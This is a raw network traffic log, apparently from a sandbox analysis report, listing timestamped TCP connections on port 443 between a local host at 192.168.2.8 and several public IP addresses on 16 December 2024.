                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.252918005 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253021002 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253037930 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253577948 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253894091 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.253972054 CET44349797172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257477045 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257525921 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257590055 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257796049 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.257808924 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.300653934 CET49797443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.300652981 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.300671101 CET44349796172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.361646891 CET49796443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.559194088 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.559278965 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.559341908 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.560276031 CET49789443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.560296059 CET44349789116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.580950022 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581032991 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581115961 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581285954 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.581325054 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594585896 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594630957 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594690084 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594887018 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.594897985 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832545996 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832617044 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832700014 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.832993031 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:20.833007097 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.120934010 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.121001005 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.121573925 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.121591091 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124057055 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124068022 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124155998 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124171019 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124183893 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124195099 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124284983 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124299049 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124306917 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124313116 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124322891 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124330997 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124581099 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124609947 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124819040 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.124834061 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125075102 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125102997 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125123978 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125134945 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125247002 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125257969 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125399113 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125407934 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125425100 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125442982 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125458956 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125474930 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125524044 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.125529051 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.146651030 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.149552107 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.149569988 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.150566101 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.150615931 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.151808023 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.151853085 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.204544067 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.204556942 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.252244949 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.466979027 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.467258930 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.467272997 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.468146086 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.468203068 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.468569994 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.468621016 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.510611057 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.510884047 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.510919094 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.511967897 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.512029886 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.513103008 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.513184071 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.521742105 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.521759987 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.567276001 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.567348957 CET4434980820.110.205.119192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.567394018 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.613162041 CET49808443192.168.2.820.110.205.119
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.790587902 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.796859980 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.796890020 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.798037052 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.798120022 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.800920010 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.801062107 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.846116066 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.846146107 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:21.893649101 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.010905981 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.011147976 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.011178970 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.012237072 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.012300968 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.013282061 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.013375044 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.067745924 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.067760944 CET4434981518.173.219.84192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.112242937 CET49815443192.168.2.818.173.219.84
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.238735914 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.238821983 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.239610910 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.239623070 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241368055 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241375923 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241472006 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241492033 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241497993 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241522074 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241535902 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241540909 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241650105 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241661072 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241683006 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241691113 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241760969 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241772890 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241790056 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241801023 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241815090 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241823912 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241837978 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241852999 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241899014 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241909027 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241934061 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241940022 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241952896 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.241959095 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242002010 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242008924 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242033005 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242041111 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242049932 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242058039 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242059946 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242065907 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242115974 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242125034 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242147923 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242158890 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242166996 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242171049 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242187023 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242202997 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242219925 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242225885 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242322922 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242331982 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242351055 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242360115 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242371082 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242377043 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242396116 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242402077 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242418051 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242424011 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242458105 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242470026 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242491961 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242499113 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242503881 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:22.242506981 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.179254055 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.179332018 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.179347038 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.179395914 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.180403948 CET49805443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.180428982 CET44349805116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874095917 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874135971 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874237061 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874443054 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:23.874452114 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420253992 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420322895 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420353889 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.420377016 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.421282053 CET49816443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.421304941 CET44349816116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.862999916 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863060951 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863254070 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863529921 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.863547087 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.887010098 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:24.927376032 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008038998 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008146048 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008410931 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008630991 CET49830443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.008686066 CET44349830116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.191658974 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.191730976 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.191806078 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.192074060 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.192090034 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.208163023 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.208369017 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.208477020 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.209441900 CET49811443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.209474087 CET4434981123.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280364037 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280421972 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280955076 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.280966043 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.282932043 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.282943964 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283032894 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283047915 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283056021 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283061028 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283092022 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283097029 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283196926 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283227921 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283409119 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283417940 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283442974 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283451080 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283457994 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283463001 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283471107 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283484936 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283494949 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283504963 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283555031 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283566952 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283606052 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283615112 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283632994 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283639908 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283644915 CET49826443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:25.283648014 CET44349826116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.074771881 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.076239109 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.076277971 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.076621056 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.086462975 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.086569071 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.128762960 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.402997017 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.403280020 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.403307915 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.403661966 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.404002905 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.404077053 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:26.415499926 CET44349830116.203.12.114192.168.2.8
